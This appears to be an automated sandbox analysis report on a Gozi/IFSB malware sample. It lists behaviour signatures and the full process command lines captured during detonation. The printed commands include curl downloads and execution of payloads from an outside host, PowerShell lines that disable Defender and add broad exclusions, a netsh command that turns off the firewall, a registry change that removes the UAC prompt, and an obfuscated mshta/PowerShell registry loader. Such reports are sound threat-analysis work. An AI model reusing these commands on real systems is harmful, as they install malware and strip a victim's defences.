Analysis Overview
SHA256
e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
Threat Level: Known bad
The file 98b082b4d65dfe4ee5b227575d1c08ef.png was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Gozi, Gozi IFSB
Modifies Windows Firewall
Downloads MZ/PE file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of FindShellTrayWindow
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Discovers systems in the same network
Gathers system information
Suspicious behavior: GetForegroundWindowSpam
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
Suspicious use of SendNotifyMessage
Enumerates processes with tasklist
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-22 09:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-22 09:41
Reported
2022-03-22 09:46
Platform
win7-20220310-en
Max time kernel
4294183s
Max time network
124s
Command Line
Signatures
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe
"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
Network
Files
memory/1132-54-0x00000000753C1000-0x00000000753C3000-memory.dmp
memory/1132-65-0x0000000000460000-0x0000000000461000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-03-22 09:41
Reported
2022-03-22 09:46
Platform
win10v2004-20220310-en
Max time kernel
151s
Max time network
154s
Command Line
Signatures
Gozi, Gozi IFSB
UAC bypass
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1768 set thread context of 620 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe |
| PID 4616 set thread context of 1048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1048 set thread context of 5004 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 1048 set thread context of 3440 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1048 set thread context of 3740 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 5004 set thread context of 2144 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 1048 set thread context of 3428 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1048 set thread context of 392 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A |
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe
"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Windows\SysWOW64\curl.exe
curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au3
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/12/WD.au3 --output WD.au3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au3
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe
AutoIt3.exe WD.au3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Windows\system32\curl.exe
curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3
C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
"C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xvsleyr -value gp; new-alias -name whpcnio -value iex; whpcnio ([System.Text.Encoding]::ASCII.GetString((xvsleyr "HKCU:Software\AppDataLow\Software\Microsoft\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453").CharFolder))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\51nl350v\51nl350v.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E9C.tmp" "c:\Users\Admin\AppData\Local\Temp\51nl350v\CSCC3572B61CE2C4D9983F3D2D7AFE08A9A.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwfwitbd\gwfwitbd.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC5.tmp" "c:\Users\Admin\AppData\Local\Temp\gwfwitbd\CSC970B265ABB4CA3B74729EAA4FE53D8.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\34A2.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\34A2.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\58E.bin1"
C:\Windows\system32\cmd.exe
